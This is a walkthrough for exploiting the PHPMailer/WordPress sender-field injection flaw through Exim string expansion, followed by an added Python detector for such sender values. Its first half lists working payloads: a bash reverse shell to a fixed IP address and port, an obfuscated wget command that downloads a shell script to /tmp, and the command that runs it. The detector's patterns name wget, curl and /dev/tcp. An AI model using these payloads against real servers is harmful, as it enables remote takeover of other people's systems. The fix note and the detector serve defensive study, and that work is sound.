AntSword connection:
The idea behind the reverse shell is the same as for writing a webshell: first use curl or wget to download a file containing the command to execute, then trigger command execution so that the file runs and the shell connects back.
Exploitation steps:
Send a payload that makes the target download 1.txt and save it to /tmp/shell
Listen on port 9999 on the attacking machine
Send a payload that makes the target run the shell
Write bash -i >& /dev/tcp/139.198.172.202/9999 0>&1 into 1.txt on the attacking machine.
Send the payload that downloads 1.txt to /tmp/shell on the target:
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}139.198.172.202${substr{0}{1}{$spool_directory}}1.txt}} null)
Listen on port 9999 on the attacking machine.
Send the payload that runs the shell:
Original: aa(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null)
Obfuscated version: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
Vulnerability fix: update WordPress and PHPMailer to the latest versions.
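The sender values above are the thing a defender can check for: an ordinary mailbox address never contains sendmail switches or Exim string expansions. The following detector is an added example, not code from the original post or from PHPMailer; it flags From/sender values shaped like the payloads on this page (the sample inputs are constructed, with the injected one copied from the page):

```python
import re

# Indicators taken from the payloads shown on this page: extra sendmail
# switches (-f, -be) smuggled inside the address, and Exim string expansions.
# ${run{...}} executes a command during expansion; ${substr{...}} is used to
# build "/" (first char of $spool_directory) and " " (11th char of $tod_log)
# without typing those characters literally.
INDICATORS = [
    r"\$\{run\{",
    r"\$\{substr\{",
    r"\$spool_directory",
    r"\$tod_log",
    r"(^|\s)-be(\s|$)",      # expansion test mode
    r"(^|\s)-f\S",           # forged envelope sender
    r"/dev/tcp/",            # bash network redirection
    r"\b(wget|curl)\b",
]
INDICATOR_RE = re.compile("|".join(INDICATORS), re.IGNORECASE)

# A plain address; whitespace, parentheses and braces cannot appear here.
SAFE_ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def is_suspicious_sender(addr: str) -> bool:
    """True when a From/sender value carries Exim expansion or sendmail
    argument injection rather than an ordinary mailbox address."""
    if SAFE_ADDRESS_RE.match(addr):
        return False
    return bool(INDICATOR_RE.search(addr))


def matched_indicators(addr: str) -> list:
    """Which indicator patterns fired, for an alert's context field."""
    return [p for p in INDICATORS if re.search(p, addr, re.IGNORECASE)]


# Constructed samples: a benign sender and one in the shape this page shows.
BENIGN = "alice@example.org"
INJECTED = ("aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin"
            "${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}"
            "${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}"
            "shell}} null)")

if __name__ == "__main__":
    for sample in (BENIGN, INJECTED):
        print(is_suspicious_sender(sample), matched_indicators(sample))
```

Run it over the sender field of web form submissions or the mail log before the value ever reaches a sendmail-compatible binary.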